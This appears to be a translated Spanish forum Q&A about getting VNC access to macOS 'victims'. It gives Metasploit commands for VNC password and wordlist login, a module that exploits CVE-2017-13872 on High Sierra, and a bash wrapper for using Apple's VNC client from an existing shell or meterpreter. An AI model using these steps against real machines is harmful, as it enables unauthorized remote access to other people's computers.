P1: ¿Existe una herramienta de configuración de un comando similar para las víctimas de MacOS? ... o tal vez algunos módulos metasploit / evilosx para configurar una conexión VNC?
Puede intentar usar vnc_login un escáner auxiliar para identificar si hay VNC disponible en destino e intentar iniciar sesión con una contraseña o una lista de palabras:
msf > use auxiliary/scanner/vnc/vnc_login
Y / o ard_root_pw para explotar remotamente CVE-2017-13872
over 5900
port - si se cumplen los requisitos :
msf > use auxiliary/scanner/vnc/ard_root_pw
Algunas notas del autor de ard_root_pw
( jgor ):
Esto extiende Rex :: Proto :: RFB para admitir nombres de usuario, implementa el tipo de seguridad de autenticación 30 ("Apple Remote Desktop" / ARD utilizado por macOS), y usa eso para agregar un módulo para explotar remotamente CVE-2017 -13872 sobre 5900 / tcp en hosts macOS High Sierra vulnerables que tengan habilitado Compartir pantalla o Administración remota habilitados.
( fuente )
P2: ¿O debo hacerlo manualmente sin scripts fáciles de usar?
Si ya tiene acceso (con shell o meterpreter) en target, debe considerar que Apple incluye un Cliente VNC de manera predeterminada, puede usarlo con un simple script bash:
echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\ >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer
Después de eso, simplemente usa: vncviewer [IP]:5901
( fuente )